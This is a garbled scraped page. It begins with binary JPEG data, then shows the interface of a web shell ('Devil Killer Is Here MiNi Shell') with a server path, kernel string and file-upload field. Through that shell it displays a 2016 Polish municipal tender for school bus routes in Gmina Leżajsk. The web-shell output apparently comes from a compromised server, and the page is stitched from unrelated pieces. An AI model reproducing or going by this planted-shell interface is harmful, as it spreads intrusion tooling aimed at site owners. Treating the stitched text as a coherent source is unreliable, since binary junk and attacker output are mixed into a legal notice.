JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160701/115649-N-2016.html

<p class="kh_header"><b>Leżajsk: Dowóz uczniów do szkół na terenie Gminy Leżajsk 
w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 115649 - 2016; data zamieszczenia: 01.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leżajsk , ul. Opalińskiego 2, 37-300 Leżajsk, woj. podkarpackie, tel. 017 240 62 00, faks 017 240 62 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminalezajsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół na terenie Gminy Leżajsk 
w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług dowozu wraz z zakupem biletów miesięcznych dla uczniów uprawnionych zgodnie z ustawą o systemie oświaty  dojeżdżających do szkół na terenie Gminy Leżajsk w roku szkolnym 2016/2017 w dni powszednie z wyłączeniem sobót, niedziel i świąt oraz innych dni ustawowo wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie obowiązujących przepisów prawa (w szczególności ferie zimowe i letnie, wiosenna i zimowa przerwa świąteczna) z podziałem na następujące trasy:

Trasa nr 1
Dowóz uczniów do Szkoły Podstawowej w Biedaczowie
Trasa przejazdu (numer i nazwa przystanków): 
I       Giedlarowa II - (7 uczniów)
II      Gwizdów (przy drodze) - (13 uczniów)
III     Gwizdów Podlas (cmentarz) - (1 uczeń)
IV     Gwizdów Podlas (na polach) - (7 uczniów)
V      Gwizdów Podlas (na górce) - (3 uczniów)
VI     Gwizdów Podlas (pod Zakąciem) - (2 uczniów)
VII    Biedaczów Olszyny - (7 uczniów)
VIII   Biedaczów Podkudłacz (stadion) - (2 uczniów)
IX     Biedaczów Podkudłacz (stara szkoła) - (5 uczniów)
X      Biedaczów - szkoła

Dowóz dzieci będzie się odbywał na jedną godzinę i Wykonawca zobowiązany jest                               do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły: Dwa odwozy w ciągu dnia zgodnie z tygodniowym rozkładem zajęć na rok szkolny 2016/2017. 
Biedaczów (szkoła) - Biedaczów Podkudłacz (stara szkoła) - Biedaczów Podkudłacz (stadion) - Biedaczów Olszyny - Gwizdów Podlas (pod Zakąciem) - Gwizdów Podlas (na górce) - Gwizdów Podlas (na polach) - Gwizdów Podlas (cmentarz) - Gwizdów (przy drodze) Giedlarowa II.

Przewidywana liczba dowożonych dzieci na trasie nr 1 wynosi około 47 uczniów.
Łączna ilość  kilometrów dla usługi dziennej około 57 km. 

Trasa nr 2
Dowóz uczniów do Zespołu Szkół w Giedlarowej 
Trasa przejazdu (numer i nazwa przystanków): Przywóz uczniów do szkoły podzielony został na dwie trasy:
 1 )   Trasa A (dwa przywozy o dwóch różnych godzinach)
IV    Gwizdów (9 uczniów)
III    Giedlarowa II -  (39  uczniów)
II     Giedlarowa - Dworczyna  - (8 uczniów)
I      Giedlarowa szkoła

2 )   Trasa B (jeden przywóz)
V     Gwizdów - Podlas (cmentarz)  - (1 uczeń)
VI    Gwizdów  - Podlas  - (2 uczniów)
VII   Gwizdów - Podlas  I -  (2 uczniów)
VIII  Biedaczów Podkudłacz (skrzyżowanie)-  (1 uczeń)
IX     Biedaczów - szkoła  (21 uczniów)
IV     Gwizdów  - (4 uczniów)
III     Giedlarowa II -  (29 uczniów)
II      Giedlarowa - Dworczyna - (8 uczniów)
I       Giedlarowa szkoła

Dowóz dzieci będzie się odbywał na różną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły:
Trasa A Giedlarowa  - szkoła, Giedlarowa - Dworczyna, Giedlarowa II, Gwizdów .
Odwóz dwa razy dziennie o dwóch różnych godzinach zgodnie z tygodniowym rozkładem zajęć na rok szkolny 2016/2017.
       
Trasa B Giedlarowa  - szkoła, Giedlarowa Dworczyna, Giedlarowa II, Gwizdów, Gwizdów Podlas (cmentarz), Gwizdów Podlas, Gwizdów Podlas I, Biedaczów - Podkudłacz                                     (skrzyżowanie), Biedaczów - szkoła. Odwóz dwa razy dziennie o dwóch różnych godzinach zgodnie z tygodniowym rozkładem zajęć na rok szkolny 2016/2017.
        
Przewidywana liczba dowożonych dzieci na trasie nr 2 (tj. trasa A i B) wynosi około 124 uczniów.
Łączna ilość  kilometrów dla usługi dziennej około 72 km.

Trasa nr 3
Dowóz uczniów do Zespołu Szkół w Starym Mieście 
Trasa przejazdu (numer i nazwa przystanków w miejscowości Przychojec): 
I    Przychojec - Łan - (3 uczniów)
II   Przychojec - szkoła - (7  uczniów)
III  Przychojec - Górka - (9 uczniów)
IV  Stare Miasto - szkoła

Dowóz  i odwóz dzieci będzie się odbywał na jedną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły: Jeden odwóz w ciągu dnia zgodnie z tygodniowym rozkładem zajęć na rok szkolny 2016/2017. 
Stare Miasto - szkoła, Przychojec - Górka, Przychojec - szkoła, Przychojec - Łan

Przewidywana liczba dowożonych dzieci na trasie nr 3 wynosi około 19 uczniów.
Łączna ilość  kilometrów dla usługi dziennej około 15 km. 

Trasa nr 4
Dowóz uczniów do Zespołu Szkół w Piskorowicach
Trasa przejazdu (numer i nazwa przystanków): Przywóz uczniów do szkoły

I   Rzuchów Osiedle - (8 uczniów)
II  Rzuchów-  przystanek - (12 uczniów)
III Piskorowice - szkoła,
IV Paluchy - (6 uczniów)
V  Piskorowice Igloopol - (8 uczniów)
VI Piskorowice - Chałupki - Pastwisko - (16 uczniów)
VII  Piskorowice Chałupki - (17 uczniów)
III    Piskorowice - szkoła
VIII Piskorowice - Mołynie - (1 uczeń)
III    Piskorowice - szkoła

Dowóz dzieci będzie się odbywał na jedną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły: Odwóz dwa razy dziennie o dwóch różnych godzinach zgodnie z tygodniowym rozkładem zajęć na rok szkolny 2016/2017.
Piskorowice szkoła - Rzuchów przystanek - Rzuchów Osiedle, Piskorowice szkoła - Piskorowice - Chałupki Pastwisko, Piskorowice - Chałupki , Paluchy, Piskorowice - Igloopol, Piskorowice Mołynie. 

Przewidywana liczba dowożonych dzieci na trasie nr 4 wynosi około 68 uczniów. 
Łączna ilość  kilometrów dla usługi dziennej  około 75 km. 

Trasa nr 5
Dowóz uczniów do Zespołu Szkół w Brzózie Królewskiej 
Trasa przejazdu ( numer i nazwa przystanków - cała trasa została podzielona na trasę A, B, C )
1 )   Trasa A  (jeden przywóz)
I       Maleniska (szkoła) - (18 uczniów)
VII   Brzóza Królewska (DPS) -  (10 uczniów)
VIII  Brzóza Królewska - szkoła

2 )   Trasa B (jeden przywóz)
II      Hucisko (szkoła) -  (13 uczniów)
III     Hucisko (Siuzdaki) - (5 uczniów)
IV     Brzóza Królewska IV- (10 uczniów )
V     Brzóza Królewska (J. Stasiowski) - (15 uczniów)
VI     Brzóza Królewska (G. Szczęch) - (10 uczniów)
VIII  Brzóza Królewska - szkoła
3 )   Trasa C (jeden przywóz)
I      Maleniska (szkoła) - (5 uczniów)
II     Hucisko (szkoła) - (6 uczniów)
III    Hucisko (Siuzdaki) - (2 uczniów)
IV    Brzóza Królewska IV - (1 uczeń)
V     Brzóza Królewska (J. Stasiowski) - (21 uczniów)
VI    Brzóza Królewska (G. Szczęch) - (6 uczniów)
VII   Brzóza Królewska (DPS) - (4 uczniów)
VIII  Brzóza Królewska -  szkoła 

Dowóz dzieci będzie się odbywał na różną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły:
Trasa A: Brzóza Królewska - szkoła, Brzóza Królewska (DPS), Maleniska (szkoła) 
Trasa B: Brzóza Królewska - szkoła, Brzóza Królewska (G. Szczęch), Brzóza Królewska        (J. Stasiowski), Brzóza Królewska IV, Hucisko (Siuzdaki), Hucisko (szkoła)
Trasa C: Brzóza Królewska - szkoła, Brzóza Królewska (DPS), Brzóza Królewska                     (G. Szczęch), Brzóza Królewska (J. Stasiowski), Brzóza Królewska IV, Hucisko (Siuzdaki), Hucisko (szkoła), Maleniska (szkoła)
Odwóz: trzy odwozy dziennie o różnych godzinach zgodnie z tygodniowym rozkładem zajęć na rok szkolny 2016/2017. 

Przewidywana liczba dowożonych dzieci na trasie nr 5 (tj. A,B i C) wynosi około 126 uczniów.
Łączna ilość kilometrów dla usługi dziennej około 60 km.

Zamawiający nie dopuszcza składania ofert częściowych. Oferta powinna być złożona na wszystkie wyżej wskazane trasy. 


Wymagania dotyczące sposobu realizacji przedmiotu zamówienia:
1.	Zamawiający zapewnia opiekę w czasie dowozu.
2.	 Trasa przejazdu oraz godziny dowozu i odwozu mogą ulec zmianie w trakcie realizacji zamówienia.
3.	 W trakcie realizacji zamówienia liczba przewożonych dzieci może ulec zmianie                        (zwiększeniu/zmniejszeniu) poprzez stosowną informację przekazaną Wykonawcy 
z miesięcznym wyprzedzeniem przez Dyrektora szkoły, jednak cena zaoferowana za jeden bilet miesięczny jest niezmienna przez cały okres realizacji zadania. 
4.	W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym przez Dyrektora Szkoły.
5.	Dowozy i odwozy odbywać się będą w godzinach ustalonych przez Dyrektora szkoły                 z Wykonawcą po akceptacji zamawiającego.
6.	Dowóz uczniów odbywać się będzie na podstawie imiennych biletów miesięcznych.
7.	Opiekun dzieci uprawniony jest do bezpłatnych przejazdów. 
8.	Dyrektorzy szkół przekażą co miesiąc Wykonawcy szczegółowy wykaz uprawnionych uczniów. Wykonawca zobowiązany jest dostarczyć bilety do poszczególnych szkół                        w terminie do dnia pierwszego każdego miesiąca którego dowóz dotyczy na swój koszt.
9.	Rozliczenia będą dokonywane w cyklu miesięcznym w terminie wskazanym w formularzu oferty od przedłożenia przez wykonawcę faktury oraz prawidłowych dokumentów tj. na podstawie  zestawienia biletów miesięcznych dla poszczególnych uczniów potwierdzonych przez właściwego Dyrektora szkoły i dostarczonych do Wieloosobowego stanowiska ds. oświaty.
10.	Środki transportu, którymi będą przewożone dzieci muszą spełniać co najmniej następujące wymagania:
        - posiadać aktualny przegląd techniczny, ubezpieczenie, ogrzewanie.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa                      w art. 67 ust. 1 pkt 6 uPzp stanowiących nie więcej niż 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 5 800,00 zł (słownie: pięć tysięcy osiemset złotych 00/100 zł).
Wadium należy wnieść w jednej lub kilku następujących formach przewidzianych w art. 45 ust. 6 uPzp, tj.:
2.	pieniądzu,
3.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
4.	gwarancjach bankowych,
5.	gwarancjach ubezpieczeniowych,
6.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 z późn. zm.).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium w pieniądzu należy przelać na konto Zamawiającego:

Bank Pekao SA I O. w Leżajsku nr 45 1240 2630 1111 0000 3637 1846

W przypadku wadium wnoszonego w pieniądzu za termin wpłynięcia wadium uznaje się termin jego wniesienia. Przez wniesienie rozumie się uznanie kwoty wadium przez rachunek Zamawiającego. Do oferty należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek Zamawiającego. Wadium wnoszone w pieniądzu powinno znajdować się fizycznie na koncie Zamawiającego przed terminem składania ofert.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu należy złożyć w osobnej kopercie opisanej Wadium - Dowóz uczniów do szkół na terenie Gminy Leżajsk w roku szkolnym 2016/2017 oraz włożyć do koperty zewnętrznej.
Wadium wniesione w formie innej niż pieniężna musi spełniać następujące wymagania:
- odpowiadać co do wartości wysokości wadium określonej w niniejszej SIWZ,
- musi odpowiadać co do terminu ważności terminowi związania ofertą określonemu w niniejszej SIWZ,
- zawierać w swej treści okoliczności (zgodnie z art. 46 ust. 4a i 5 uPzp) w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu, wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie zamawiającego bez protestu gwaranta (poręczyciela),
Zamawiający zwróci niezwłocznie wadium na zasadach określonych w art. 46 uPzp.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
	1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
	2)	  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.

Wykonawca lub podmiot wystawiający gwarancję bankową/ubezpieczeniową nie może uzależnić dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności, jak również od przedłożenia dodatkowej dokumentacji, dodatkowych oświadczeń złożonych przez wykonawcę lub inny podmiot.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia tj.: Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień             (wg załącznika nr 3  do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 10 autobusami do realizacji przewozów dla poszczególnych tras          (wg załącznika nr 6 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy.
2) Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu 
3) Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań. Musi być załączone w oryginale albo załączone jako kopia pełnomocnictwa uwierzytelniona notarialnie (jeśli dotyczy).
4) Informacja o podwykonawcach (jeśli dotyczy).
5) Pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (jeśli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności za wykonane usługi - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
